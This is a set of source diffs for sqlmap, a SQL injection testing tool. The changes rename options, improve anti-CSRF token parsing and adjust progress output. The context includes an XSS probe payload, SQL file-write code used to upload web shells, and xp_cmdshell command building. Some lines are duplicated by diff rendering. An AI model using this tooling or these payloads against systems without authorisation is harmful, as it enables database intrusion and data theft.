HASH_MOD_ITEM_DISPLAY = 11
# Display marker for (cracked) empty password
HASH_EMPTY_PASSWORD_MARKER = "<empty>"
# Maximum integer value
MAX_INT = sys.maxint
@@ -524,7 +531,7 @@ CHECK_INTERNET_ADDRESS = "https://ipinfo.io/"
# Value to look for in response to CHECK_INTERNET_ADDRESS
CHECK_INTERNET_VALUE = "IP Address Details"
- # Vectors used for provoking specific WAF/IPS/IDS behavior(s)
+ # Vectors used for provoking specific WAF/IPS behavior(s)
WAF_ATTACK_VECTORS = (
"", # NIL
"search=<script>alert(1)</script>",
@@ -748,7 +755,7 @@ EVALCODE_KEYWORD_SUFFIX = "_KEYWORD"
NETSCAPE_FORMAT_HEADER_COOKIES = "# Netscape HTTP Cookie File."
# Infixes used for automatic recognition of parameters carrying anti-CSRF tokens
- CSRF_TOKEN_PARAMETER_INFIXES = ("csrf", "xsrf")
+ CSRF_TOKEN_PARAMETER_INFIXES = ("csrf", "xsrf", "token")
# Prefixes used in brute force search for web server document root
BRUTE_DOC_ROOT_PREFIXES = {
@@ -786,9 +793,9 @@ tr:nth-child(even) {
background-color: #D3DFEE
}
td{
- font-size:10px;
+ font-size:12px;
}
th{
- font-size:10px;
+ font-size:12px;
}
</style>"""

View File

@@ -5,7 +5,6 @@ Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import codecs
import functools
import os
import re
@@ -571,7 +570,7 @@ def _createFilesDir():
Create the file directory.
"""
- if not conf.rFile:
+ if not conf.fileRead:
return
conf.filePath = paths.SQLMAP_FILES_PATH % conf.hostname
@@ -671,8 +670,10 @@ def _createTargetDirs():
conf.outputPath = tempDir
conf.outputPath = getUnicode(conf.outputPath)
try:
- with codecs.open(os.path.join(conf.outputPath, "target.txt"), "w+", UNICODE_ENCODING) as f:
+ with openFile(os.path.join(conf.outputPath, "target.txt"), "w+") as f:
f.write(kb.originalUrls.get(conf.url) or conf.url or conf.hostname)
f.write(" (%s)" % (HTTPMETHOD.POST if conf.data else HTTPMETHOD.GET))
f.write(" # %s" % getUnicode(subprocess.list2cmdline(sys.argv), encoding=sys.stdin.encoding))
@@ -691,6 +692,13 @@ def _createTargetDirs():
_createFilesDir()
_configureDumper()
def _setAuxOptions():
"""
Setup auxiliary (host-dependent) options
"""
kb.aliasName = randomStr(seed=hash(conf.hostname or ""))
def _restoreMergedOptions():
"""
Restore merged options (command line, configuration file and default values)
@@ -744,3 +752,4 @@ def setupTargetEnv():
_resumeHashDBValues()
_setResultsFile()
_setAuthCred()
_setAuxOptions()

View File

@@ -95,7 +95,7 @@ def exceptionHandledFunction(threadFunction, silent=False):
if not silent:
logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message))
- if conf.verbose > 1:
+ if conf.get("verbose") > 1:
traceback.print_exc()
def setDaemon(thread):
@@ -168,6 +168,7 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
except (KeyboardInterrupt, SqlmapUserQuitException), ex:
print
kb.prependFlag = False
kb.threadContinue = False
kb.threadException = True
@@ -188,7 +189,7 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
kb.threadException = True
logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message))
- if conf.verbose > 1:
+ if conf.get("verbose") > 1:
traceback.print_exc()
except:

View File

@@ -17,6 +17,7 @@ import zipfile
from lib.core.common import dataToStdout
from lib.core.common import getSafeExString
from lib.core.common import getLatestRevision
from lib.core.common import pollProcess
from lib.core.common import readInput
from lib.core.data import conf
@@ -25,6 +26,7 @@ from lib.core.data import paths
from lib.core.revision import getRevisionNumber
from lib.core.settings import GIT_REPOSITORY
from lib.core.settings import IS_WIN
from lib.core.settings import VERSION
from lib.core.settings import ZIPBALL_PAGE
from lib.core.settings import UNICODE_ENCODING
@@ -39,6 +41,10 @@ def update():
warnMsg += "from GitHub (e.g. 'git clone --depth 1 %s sqlmap')" % GIT_REPOSITORY warnMsg += "from GitHub (e.g. 'git clone --depth 1 %s sqlmap')" % GIT_REPOSITORY
logger.warn(warnMsg) logger.warn(warnMsg)
if VERSION == getLatestRevision():
logger.info("already at the latest revision '%s'" % getRevisionNumber())
return
message = "do you want to try to fetch the latest 'zipball' from repository and extract it (experimental) ? [y/N]" message = "do you want to try to fetch the latest 'zipball' from repository and extract it (experimental) ? [y/N]"
if readInput(message, default='N', boolean=True): if readInput(message, default='N', boolean=True):
directory = os.path.abspath(paths.SQLMAP_ROOT_PATH) directory = os.path.abspath(paths.SQLMAP_ROOT_PATH)

View File

@@ -207,7 +207,7 @@ def cmdLineParser(argv=None):
help="Parameter used to hold anti-CSRF token") help="Parameter used to hold anti-CSRF token")
request.add_option("--csrf-url", dest="csrfUrl", request.add_option("--csrf-url", dest="csrfUrl",
help="URL address to visit to extract anti-CSRF token") help="URL address to visit for extraction of anti-CSRF token")
request.add_option("--force-ssl", dest="forceSSL", action="store_true", request.add_option("--force-ssl", dest="forceSSL", action="store_true",
help="Force usage of SSL/HTTPS") help="Force usage of SSL/HTTPS")
@@ -471,13 +471,13 @@ def cmdLineParser(argv=None):
# File system options
filesystem = OptionGroup(parser, "File system access", "These options can be used to access the back-end database management system underlying file system")
- filesystem.add_option("--file-read", dest="rFile",
+ filesystem.add_option("--file-read", dest="fileRead",
help="Read a file from the back-end DBMS file system")
- filesystem.add_option("--file-write", dest="wFile",
+ filesystem.add_option("--file-write", dest="fileWrite",
help="Write a local file on the back-end DBMS file system")
- filesystem.add_option("--file-dest", dest="dFile",
+ filesystem.add_option("--file-dest", dest="fileDest",
help="Back-end DBMS absolute filepath to write to")
# Takeover options
@@ -635,7 +635,10 @@ def cmdLineParser(argv=None):
help="Use Google dork results from specified page number") help="Use Google dork results from specified page number")
miscellaneous.add_option("--identify-waf", dest="identifyWaf", action="store_true", miscellaneous.add_option("--identify-waf", dest="identifyWaf", action="store_true",
help="Make a thorough testing for a WAF/IPS/IDS protection") help="Make a thorough testing for a WAF/IPS protection")
miscellaneous.add_option("--list-tampers", dest="listTampers", action="store_true",
help="Display list of available tamper scripts")
miscellaneous.add_option("--mobile", dest="mobile", action="store_true", miscellaneous.add_option("--mobile", dest="mobile", action="store_true",
help="Imitate smartphone through HTTP User-Agent header") help="Imitate smartphone through HTTP User-Agent header")
@@ -647,7 +650,7 @@ def cmdLineParser(argv=None):
help="Safely remove all content from sqlmap data directory") help="Safely remove all content from sqlmap data directory")
miscellaneous.add_option("--skip-waf", dest="skipWaf", action="store_true", miscellaneous.add_option("--skip-waf", dest="skipWaf", action="store_true",
help="Skip heuristic detection of WAF/IPS/IDS protection") help="Skip heuristic detection of WAF/IPS protection")
miscellaneous.add_option("--smart", dest="smart", action="store_true", miscellaneous.add_option("--smart", dest="smart", action="store_true",
help="Conduct thorough tests only if positive heuristic(s)") help="Conduct thorough tests only if positive heuristic(s)")
@@ -750,6 +753,7 @@ def cmdLineParser(argv=None):
prompt = False
advancedHelp = True
extraHeaders = []
tamperIndex = None
# Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING")
for arg in argv:
@@ -821,6 +825,12 @@ def cmdLineParser(argv=None):
elif re.search(r"\A-\w=.+", argv[i]): elif re.search(r"\A-\w=.+", argv[i]):
dataToStdout("[!] potentially miswritten (illegal '=') short option detected ('%s')\n" % argv[i]) dataToStdout("[!] potentially miswritten (illegal '=') short option detected ('%s')\n" % argv[i])
raise SystemExit raise SystemExit
elif argv[i].startswith("--tamper"):
if tamperIndex is None:
tamperIndex = i if '=' in argv[i] else (i + 1 if i + 1 < len(argv) and not argv[i + 1].startswith('-') else None)
else:
argv[tamperIndex] = "%s,%s" % (argv[tamperIndex], argv[i].split('=')[1] if '=' in argv[i] else (argv[i + 1] if i + 1 < len(argv) and not argv[i + 1].startswith('-') else ""))
argv[i] = ""
elif argv[i] == "-H": elif argv[i] == "-H":
if i + 1 < len(argv): if i + 1 < len(argv):
extraHeaders.append(argv[i + 1]) extraHeaders.append(argv[i + 1])
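The new "--tamper" handling in the hunk above concatenates repeated occurrences into the first one before option parsing, so "--tamper A --tamper B" behaves like "--tamper=A,B". A minimal standalone Python sketch of that preprocessing idea (the merge_tampers() helper and the sample arguments are illustrative, not sqlmap code):

def merge_tampers(argv):
    # Collapse repeated "--tamper" options into the first occurrence
    result = list(argv)
    first = None  # index of the token holding the merged value
    i = 0
    while i < len(result):
        arg = result[i]
        if arg.startswith("--tamper"):
            if '=' in arg:
                index, value = i, arg.split('=', 1)[1]
            elif i + 1 < len(result):
                index, value = i + 1, result[i + 1]
            else:
                index, value = i, ""
            if first is None:
                first = index
            else:
                result[first] = "%s,%s" % (result[first], value)
                result[i] = ""          # blank out the duplicate option token
                if index != i:
                    result[index] = ""  # and its separate value token
        i += 1
    return [_ for _ in result if _ != ""]

print(merge_tampers(["-u", "http://www.example.com/", "--tamper", "between", "--tamper=space2comment"]))
# ['-u', 'http://www.example.com/', '--tamper', 'between,space2comment']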
@@ -874,9 +884,9 @@ def cmdLineParser(argv=None):
if args.dummy:
args.url = args.url or DUMMY_URL
- if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, args.purge, args.sitemapUrl)):
+ if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, args.purge, args.sitemapUrl, args.listTampers)):
- errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), "
+ errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --list-tampers, --wizard, --update, --purge or --dependencies). "
- errMsg += "use -h for basic or -hh for advanced help\n"
+ errMsg += "Use -h for basic and -hh for advanced help\n"
parser.error(errMsg)
return args

View File

@@ -6,6 +6,7 @@ See the file 'LICENSE' for copying permission
""" """
import os import os
import re
from xml.etree import ElementTree as et from xml.etree import ElementTree as et
@@ -17,6 +18,9 @@ from lib.core.exception import SqlmapInstallationException
from lib.core.settings import PAYLOAD_XML_FILES
def cleanupVals(text, tag):
if tag == "clause" and '-' in text:
text = re.sub(r"(\d+)-(\d+)", lambda match: ','.join(str(_) for _ in xrange(int(match.group(1)), int(match.group(2)) + 1)), text)
if tag in ("clause", "where"): if tag in ("clause", "where"):
text = text.split(',') text = text.split(',')
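The added branch above expands dashed ranges inside <clause> values (e.g. "1-3") into explicit comma-separated lists before the split. A tiny standalone illustration of that substitution, detached from the payload XML parser:

import re

def expand_clause(text):
    # "1-3,9" -> "1,2,3,9"
    return re.sub(r"(\d+)-(\d+)",
                  lambda match: ','.join(str(_) for _ in range(int(match.group(1)), int(match.group(2)) + 1)),
                  text)

print(expand_clause("1-3,9").split(','))  # ['1', '2', '3', '9']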

View File

@@ -137,10 +137,14 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
seq1 = seq1.replace(REFLECTED_VALUE_MARKER, "") seq1 = seq1.replace(REFLECTED_VALUE_MARKER, "")
seq2 = seq2.replace(REFLECTED_VALUE_MARKER, "") seq2 = seq2.replace(REFLECTED_VALUE_MARKER, "")
if kb.heavilyDynamic:
seq1 = seq1.split("\n")
seq2 = seq2.split("\n")
seqMatcher.set_seq1(seq1)
seqMatcher.set_seq2(seq2)
- ratio = round(seqMatcher.quick_ratio(), 3)
+ ratio = round(seqMatcher.quick_ratio() if not kb.heavilyDynamic else seqMatcher.ratio(), 3)
# If the url is stable and we did not set yet the match ratio and the
# current injected value changes the url page content

View File

@@ -16,6 +16,7 @@ import string
import struct
import time
import traceback
import urllib
import urllib2
import urlparse
@@ -97,6 +98,7 @@ from lib.core.settings import MAX_CONSECUTIVE_CONNECTION_ERRORS
from lib.core.settings import MAX_MURPHY_SLEEP_TIME
from lib.core.settings import META_REFRESH_REGEX
from lib.core.settings import MIN_TIME_RESPONSES
from lib.core.settings import IDS_WAF_CHECK_PAYLOAD
from lib.core.settings import IS_WIN
from lib.core.settings import LARGE_CHUNK_TRIM_MARKER
from lib.core.settings import PAYLOAD_DELIMITER
@@ -490,9 +492,10 @@ class Connect(object):
page = Connect._connReadProxy(conn) if not skipRead else None
if conn:
- code = conn.code
+ code = (code or conn.code) if conn.code == kb.originalCode else conn.code # do not override redirection code (for comparison purposes)
responseHeaders = conn.info()
responseHeaders[URI_HTTP_HEADER] = conn.geturl()
kb.serverHeader = responseHeaders.get(HTTP_HEADER.SERVER, kb.serverHeader)
else:
code = None
responseHeaders = {}
@@ -646,7 +649,7 @@ class Connect(object):
warnMsg = "connection was forcibly closed by the target URL" warnMsg = "connection was forcibly closed by the target URL"
elif "timed out" in tbMsg: elif "timed out" in tbMsg:
if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED): if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED):
singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS/IDS) is dropping 'suspicious' requests") singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS) is dropping 'suspicious' requests")
kb.droppingRequests = True kb.droppingRequests = True
warnMsg = "connection timed out to the target URL" warnMsg = "connection timed out to the target URL"
elif "Connection reset" in tbMsg: elif "Connection reset" in tbMsg:
@@ -655,7 +658,7 @@ class Connect(object):
conf.disablePrecon = True
if kb.testMode:
- singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS/IDS) is resetting 'suspicious' requests")
+ singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS) is resetting 'suspicious' requests")
kb.droppingRequests = True
warnMsg = "connection reset to the target URL"
elif "URLError" in tbMsg or "error" in tbMsg:
@@ -945,15 +948,27 @@ class Connect(object):
return retVal
page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, data=conf.data if conf.csrfUrl == conf.url else None, method=conf.method if conf.csrfUrl == conf.url else None, cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST))
- token = extractRegexResult(r"(?i)<input[^>]+\bname=[\"']?%s[\"']?[^>]*\bvalue=(?P<result>(\"([^\"]+)|'([^']+)|([^ >]+)))" % re.escape(conf.csrfToken), page or "")
+ token = extractRegexResult(r"(?i)<input[^>]+\bname=[\"']?%s\b[^>]*\bvalue=[\"']?(?P<result>[^>'\"]*)" % re.escape(conf.csrfToken), page or "")
if not token:
- token = extractRegexResult(r"(?i)<input[^>]+\bvalue=(?P<result>(\"([^\"]+)|'([^']+)|([^ >]+)))[^>]+\bname=[\"']?%s[\"']?" % re.escape(conf.csrfToken), page or "")
+ token = extractRegexResult(r"(?i)<input[^>]+\bvalue=[\"']?(?P<result>[^>'\"]*)[\"']?[^>]*\bname=[\"']?%s\b" % re.escape(conf.csrfToken), page or "")
if not token:
match = re.search(r"%s[\"']:[\"']([^\"']+)" % re.escape(conf.csrfToken), page or "")
token = match.group(1) if match else None
if not token:
token = extractRegexResult(r"\b%s\s*[:=]\s*(?P<result>\w+)" % re.escape(conf.csrfToken), str(headers))
if not token:
token = extractRegexResult(r"\b%s\s*=\s*['\"]?(?P<result>[^;'\"]+)" % re.escape(conf.csrfToken), page or "")
if token:
match = re.search(r"String\.fromCharCode\(([\d+, ]+)\)", token)
if match:
token = "".join(chr(int(_)) for _ in match.group(1).replace(' ', "").split(','))
if not token:
if conf.csrfUrl != conf.url and code == httplib.OK:
if headers and "text/plain" in headers.get(HTTP_HEADER.CONTENT_TYPE, ""):
@@ -1232,13 +1247,20 @@ class Connect(object):
warnMsg = "site returned insanely large response" warnMsg = "site returned insanely large response"
if kb.testMode: if kb.testMode:
warnMsg += " in testing phase. This is a common " warnMsg += " in testing phase. This is a common "
warnMsg += "behavior in custom WAF/IPS/IDS solutions" warnMsg += "behavior in custom WAF/IPS solutions"
singleTimeWarnMessage(warnMsg) singleTimeWarnMessage(warnMsg)
if conf.secondUrl: if conf.secondUrl:
page, headers, code = Connect.getPage(url=conf.secondUrl, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) page, headers, code = Connect.getPage(url=conf.secondUrl, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True)
elif kb.secondReq: elif kb.secondReq and IDS_WAF_CHECK_PAYLOAD not in urllib.unquote(value or ""):
page, headers, code = Connect.getPage(url=kb.secondReq[0], post=kb.secondReq[2], method=kb.secondReq[1], cookie=kb.secondReq[3], silent=silent, auxHeaders=dict(auxHeaders, **dict(kb.secondReq[4])), response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) def _(value):
if kb.customInjectionMark in (value or ""):
if payload is None:
value = value.replace(kb.customInjectionMark, "")
else:
value = re.sub(r"\w*%s" % re.escape(kb.customInjectionMark), payload, value)
return value
page, headers, code = Connect.getPage(url=_(kb.secondReq[0]), post=_(kb.secondReq[2]), method=kb.secondReq[1], cookie=kb.secondReq[3], silent=silent, auxHeaders=dict(auxHeaders, **dict(kb.secondReq[4])), response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True)
threadData.lastQueryDuration = calculateDeltaSeconds(start) threadData.lastQueryDuration = calculateDeltaSeconds(start)
threadData.lastPage = page threadData.lastPage = page

View File

@@ -9,6 +9,8 @@ import httplib
import urllib2
from lib.core.data import conf
from lib.core.common import getSafeExString
from lib.core.exception import SqlmapConnectionException
class HTTPSPKIAuthHandler(urllib2.HTTPSHandler):
def __init__(self, auth_file):
@@ -19,5 +21,10 @@ class HTTPSPKIAuthHandler(urllib2.HTTPSHandler):
return self.do_open(self.getConnection, req)
def getConnection(self, host, timeout=None):
- # Reference: https://docs.python.org/2/library/ssl.html#ssl.SSLContext.load_cert_chain
- return httplib.HTTPSConnection(host, cert_file=self.auth_file, key_file=self.auth_file, timeout=conf.timeout)
+ try:
+ # Reference: https://docs.python.org/2/library/ssl.html#ssl.SSLContext.load_cert_chain
+ return httplib.HTTPSConnection(host, cert_file=self.auth_file, key_file=self.auth_file, timeout=conf.timeout)
+ except IOError, ex:
+ errMsg = "error occurred while using key "
+ errMsg += "file '%s' ('%s')" % (self.auth_file, getSafeExString(ex))
+ raise SqlmapConnectionException(errMsg)

View File

@@ -108,7 +108,7 @@ class UDF:
return output
def udfCheckNeeded(self):
- if (not conf.rFile or (conf.rFile and not Backend.isDbms(DBMS.PGSQL))) and "sys_fileread" in self.sysUdfs:
+ if (not conf.fileRead or (conf.fileRead and not Backend.isDbms(DBMS.PGSQL))) and "sys_fileread" in self.sysUdfs:
self.sysUdfs.pop("sys_fileread")
if not conf.osPwn:

View File

@@ -146,8 +146,7 @@ class Web:
query += "OR %d=%d " % (randInt, randInt) query += "OR %d=%d " % (randInt, randInt)
query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=hexencode(uplQuery, conf.encoding)) query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=hexencode(uplQuery, conf.encoding))
query = agent.prefixQuery(query) query = agent.prefixQuery(query) # Note: No need for suffix as 'write_file_limit' already ends with comment (required)
query = agent.suffixQuery(query)
payload = agent.payload(newValue=query) payload = agent.payload(newValue=query)
page = Request.queryPage(payload) page = Request.queryPage(payload)

View File

@@ -136,7 +136,7 @@ class XP_cmdshell:
for line in lines:
echoedLine = "echo %s " % line
- echoedLine += ">> \"%s\%s\"" % (tmpPath, randDestFile)
+ echoedLine += ">> \"%s\\%s\"" % (tmpPath, randDestFile)
echoedLines.append(echoedLine)
for echoedLine in echoedLines:
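A side note on the escaping fix above: since \% is not a recognized Python escape sequence, the old "%s\%s" literal already produced a single backslash, so the old and new format strings render identically; the doubled backslash only makes the intent explicit (and avoids the invalid-escape warnings that newer Python versions emit). A quick standalone check, with made-up sample values:

tmpPath, randDestFile = "C:\\WINDOWS\\Temp", "tmpabcd.txt"
old = ">> \"%s\%s\"" % (tmpPath, randDestFile)   # unrecognized escape: backslash is kept as-is
new = ">> \"%s\\%s\"" % (tmpPath, randDestFile)  # explicit escaped backslash
print(old == new)  # True
print(new)         # >> "C:\WINDOWS\Temp\tmpabcd.txt"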

View File

@@ -472,7 +472,6 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
currentCharIndex = threadData.shared.index[0]
if kb.threadContinue:
start = time.time()
val = getChar(currentCharIndex, asciiTbl, not(charsetType is None and conf.charset))
if val is None:
val = INFERENCE_UNKNOWN_CHAR
@@ -485,7 +484,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
if kb.threadContinue:
if showEta:
- progress.progress(calculateDeltaSeconds(start), threadData.shared.index[0])
+ progress.progress(threadData.shared.index[0])
elif conf.verbose >= 1:
startCharIndex = 0
endCharIndex = 0
@@ -502,7 +501,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
count = threadData.shared.start
for i in xrange(startCharIndex, endCharIndex + 1):
- output += '_' if currentValue[i] is None else currentValue[i]
+ output += '_' if currentValue[i] is None else filterControlChars(currentValue[i] if len(currentValue[i]) == 1 else ' ', replacement=' ')
for i in xrange(length):
count += 1 if currentValue[i] is not None else 0
@@ -519,7 +518,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
status = ' %d/%d (%d%%)' % (_, length, int(100.0 * _ / length))
output += status if _ != length else " " * len(status)
- dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), filterControlChars(output)))
+ dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), output))
runThreads(numThreads, blindThread, startThreadMsg=False)
@@ -553,7 +552,6 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
while True:
index += 1
start = time.time()
# Common prediction feature (a.k.a. "good samaritan")
# NOTE: to be used only when multi-threading is not set for
@@ -578,7 +576,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
# Did we have luck?
if result:
if showEta:
- progress.progress(calculateDeltaSeconds(start), len(commonValue))
+ progress.progress(len(commonValue))
elif conf.verbose in (1, 2) or conf.api:
dataToStdout(filterControlChars(commonValue[index - 1:]))
@@ -628,7 +626,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
threadData.shared.value = partialValue = partialValue + val
if showEta:
- progress.progress(calculateDeltaSeconds(start), index)
+ progress.progress(index)
elif conf.verbose in (1, 2) or conf.api:
dataToStdout(filterControlChars(val))

View File

@@ -16,6 +16,7 @@ from lib.core.common import calculateDeltaSeconds
from lib.core.common import dataToStdout
from lib.core.common import decodeHexValue
from lib.core.common import extractRegexResult
from lib.core.common import firstNotNone
from lib.core.common import getConsoleWidth
from lib.core.common import getPartRun
from lib.core.common import getUnicode
@@ -102,7 +103,7 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False):
try:
while True:
check = r"(?si)%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop)
- trimcheck = r"(?si)%s(?P<result>[^<\n]*)" % kb.chars.start
+ trimCheck = r"(?si)%s(?P<result>[^<\n]*)" % kb.chars.start
if field:
nulledCastedField = agent.nullAndCastField(field)
@@ -133,22 +134,21 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False):
# Parse the returned page to get the exact error-based
# SQL injection output
- output = reduce(lambda x, y: x if x is not None else y, (
+ output = firstNotNone(
extractRegexResult(check, page),
extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None),
extractRegexResult(check, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)),
- extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)),
+ extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)
- None
)
if output is not None:
output = getUnicode(output)
else:
- trimmed = (
+ trimmed = firstNotNone(
- extractRegexResult(trimcheck, page) or
+ extractRegexResult(trimCheck, page),
- extractRegexResult(trimcheck, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None) or
+ extractRegexResult(trimCheck, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None),
- extractRegexResult(trimcheck, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)) or
+ extractRegexResult(trimCheck, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)),
- extractRegexResult(trimcheck, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)
+ extractRegexResult(trimCheck, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)
)
if trimmed:
@@ -163,7 +163,7 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False):
output = extractRegexResult(check, trimmed, re.IGNORECASE)
if not output:
- check = "(?P<result>[^\s<>'\"]+)"
+ check = r"(?P<result>[^\s<>'\"]+)"
output = extractRegexResult(check, trimmed, re.IGNORECASE)
else:
output = output.rstrip()
@@ -402,7 +402,6 @@ def errorUse(expression, dump=False):
while kb.threadContinue:
with kb.locks.limit:
try:
valueStart = time.time()
threadData.shared.counter += 1
num = threadData.shared.limits.next()
except StopIteration:
@@ -419,7 +418,7 @@ def errorUse(expression, dump=False):
with kb.locks.value:
index = None
if threadData.shared.showEta:
- threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter)
+ threadData.shared.progress.progress(threadData.shared.counter)
for index in xrange(1 + len(threadData.shared.buffered)):
if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:
break

View File

@@ -56,7 +56,7 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
query = agent.suffixQuery(query, suffix=suffix, comment=comment)
payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where)
page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False)
- return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order by", "unknown column", "failed")) and not kb.heavilyDynamic and comparison(page, headers, code) or re.search(r"data types cannot be compared or sorted", page or "", re.I) is not None
+ return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order (by|clause)", "unknown column", "failed")) and not kb.heavilyDynamic and comparison(page, headers, code) or re.search(r"data types cannot be compared or sorted", page or "", re.I) is not None
if _orderByTest(1 if lowerCount is None else lowerCount) and not _orderByTest(randomInt() if upperCount is None else upperCount + 1):
infoMsg = "'ORDER BY' technique appears to be usable. "

View File

@@ -19,6 +19,7 @@ from lib.core.common import calculateDeltaSeconds
from lib.core.common import clearConsoleLine
from lib.core.common import dataToStdout
from lib.core.common import extractRegexResult
from lib.core.common import firstNotNone
from lib.core.common import flattenValue
from lib.core.common import getConsoleWidth
from lib.core.common import getPartRun
@@ -90,7 +91,10 @@ def _oneShotUnionUse(expression, unpack=True, limited=False):
# Parse the returned page to get the exact UNION-based
# SQL injection output
def _(regex):
- return reduce(lambda x, y: x if x is not None else y, (extractRegexResult(regex, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE), extractRegexResult(regex, removeReflectiveValues(listToStrValue((_ for _ in headers.headers if not _.startswith(HTTP_HEADER.URI)) if headers else None), payload, True), re.DOTALL | re.IGNORECASE)), None)
+ return firstNotNone(
extractRegexResult(regex, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE),
extractRegexResult(regex, removeReflectiveValues(listToStrValue((_ for _ in headers.headers if not _.startswith(HTTP_HEADER.URI)) if headers else None), payload, True), re.DOTALL | re.IGNORECASE)
)
# Automatically patching last char trimming cases
if kb.chars.stop not in (page or "") and kb.chars.stop[:-1] in (page or ""):
@@ -308,7 +312,6 @@ def unionUse(expression, unpack=True, dump=False):
while kb.threadContinue:
with kb.locks.limit:
try:
valueStart = time.time()
threadData.shared.counter += 1
num = threadData.shared.limits.next()
except StopIteration:
@@ -333,7 +336,7 @@ def unionUse(expression, unpack=True, dump=False):
items = parseUnionPage(output)
if threadData.shared.showEta:
- threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter)
+ threadData.shared.progress.progress(threadData.shared.counter)
if isListLike(items):
# in case that we requested N columns and we get M!=N then we have to filter a bit
if len(items) > 1 and len(expressionFieldsList) > 1:
@@ -355,7 +358,7 @@ def unionUse(expression, unpack=True, dump=False):
else:
index = None
if threadData.shared.showEta:
- threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter)
+ threadData.shared.progress.progress(threadData.shared.counter)
for index in xrange(1 + len(threadData.shared.buffered)):
if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:
break

View File

@@ -65,7 +65,7 @@ def checkDependencies():
except ImportError:
warnMsg = "sqlmap requires 'python-impacket' third-party library for "
warnMsg += "out-of-band takeover feature. Download from "
- warnMsg += "'http://code.google.com/p/impacket/'"
+ warnMsg += "'https://github.com/coresecurity/impacket'"
logger.warn(warnMsg)
missing_libraries.add('python-impacket')
@@ -76,7 +76,7 @@ def checkDependencies():
except ImportError:
warnMsg = "sqlmap requires 'python-ntlm' third-party library "
warnMsg += "if you plan to attack a web application behind NTLM "
- warnMsg += "authentication. Download from 'http://code.google.com/p/python-ntlm/'"
+ warnMsg += "authentication. Download from 'https://github.com/mullender/python-ntlm'"
logger.warn(warnMsg)
missing_libraries.add('python-ntlm')
